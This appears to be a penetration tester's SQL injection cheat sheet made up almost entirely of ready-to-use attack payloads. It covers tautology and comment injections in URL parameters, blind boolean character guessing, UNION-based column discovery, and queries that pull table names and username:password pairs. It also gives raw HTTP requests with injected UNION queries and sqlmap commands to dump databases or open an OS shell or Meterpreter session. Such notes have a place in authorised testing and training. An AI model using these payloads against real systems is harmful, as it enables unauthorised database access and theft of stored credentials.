SQL Injection
Finding an Opportunity
- GET parameter
http://example.com/index.php?id=' or 1=1 -- -
- Sometimes a numeric ID comes first; try it with and without the closing quote
http://example.com/index.php?id=10 or 1=1 -- +
http://example.com/index.php?id=10' or '1'='1'-- -
http://example.com/index.php?id=-1' or 1=1 -- -&password=x
- Provoke error to gain information
http://example.com/index.php?id='
- In case of client-side sanitization, craft the URL directly instead of using the form
Usage
- Example: terminate the string with ', resolve the condition via a tautology, and comment out the rest of the query via --
SELECT * FROM users WHERE username = admin AND password = '' and 1=1 -- -
SELECT * FROM users WHERE username = admin AND password = '' or 1=1 --+
Boolean True and False
SELECT * FROM users WHERE username = admin AND password = '1' or 1 < 2 --+
SELECT * FROM users WHERE username = admin AND password = '1' or 1 > 2 --+
Blind injection // Guessing characters
http://example.com/?id=1' and substr((select database()),1,1) < 105 --+
http://example.com/?id=1' and ascii(substr((select database()),1,1)) = 115 --+
- Function substr(string, start, length)
- sqlmap via
--level=5 --risk=3 --dbms=sqlite --technique=b --dump
Union based
- First method: increase the ORDER BY index until an error occurs
' order by 1 -- -
' order by 2 -- -
' order by 3 -- -
- Second method: fuzz with NULL values, then fuzz the data type of each column
- Check number of cols
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--
# until the error occurs
- Check which one is a string
' UNION SELECT 'a',NULL,NULL,NULL--
' UNION SELECT NULL,'a',NULL,NULL--
' UNION SELECT NULL,NULL,'a',NULL--
' UNION SELECT NULL,NULL,NULL,'a'--
- Retrieve content (the examples below use five columns and a doubled comment terminator), or dump the database
' UNION SELECT NULL,NULL,database(),NULL,NULL from users -- //
' UNION SELECT NULL,username,password,NULL FROM users -- //
Identify Database
id=sqlite_version()
id=@@version # mysql/mssql
id=(SELECT banner FROM v$version) # oracle
SQL Functions
- Use SQL functions to enumerate the tables and columns via UNION
- Extract tables
1' and 1=2 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema = database() -- -
- sqlite specific
' UNION SELECT sql, sql FROM sqlite_master -- -
(SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='usertable')
(SELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%')
- Extract cols
1' and 1=2 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_schema = database() and table_name ='user'-- -
- Data from cols
1' and 1=2 union select 1,group_concat(username,0x3a,password),3,4 from user-- -
Examples
- SQLi inside an HTTP request to an API; the five columns of the SELECT have been discovered beforehand
```HTTP
GET /about/0 UNION select column_name, null,null,null,null from information_schema.columns where table_name = 'user' HTTP/1.1
```
* Get col names
```HTTP
GET /about/0 UNION all select group_concat(column_name), null,null,null,null from information_schema.columns where table_name = 'user' HTTP/1.1
```
* Get notes from users by id
```HTTP
GET /about/0 UNION all select notes, null, null, null, null from users where id = 4711 HTTP/1.1
```
Tools
SQLmap
- sqlmap
- CheatSheet
- Examples
- Use -r with a saved HTTP request
sqlmap -r request.txt --dbms=mysql --dump
sqlmap -r request.txt --batch
- Select form data automatically
sqlmap -u http://<target-IP>/site.php --forms --dump-all
|Parameter|Details|
|---|---|
|-r|Uses the intercepted request saved as a file|
|--dbms|DBMS of the target|
|--dump|Dump the entire database|
|--dump-all|Dump everything|
|-p|Testable parameter(s) (TESTPARAMETER)|
|--os-shell|Prompt for an interactive operating system shell|
|--os-pwn|Prompt for an OOB shell, Meterpreter or VNC|
Damn Small SQLi Scanner (DSSS)
python dsss.py -u "http://example.com/index.php?id="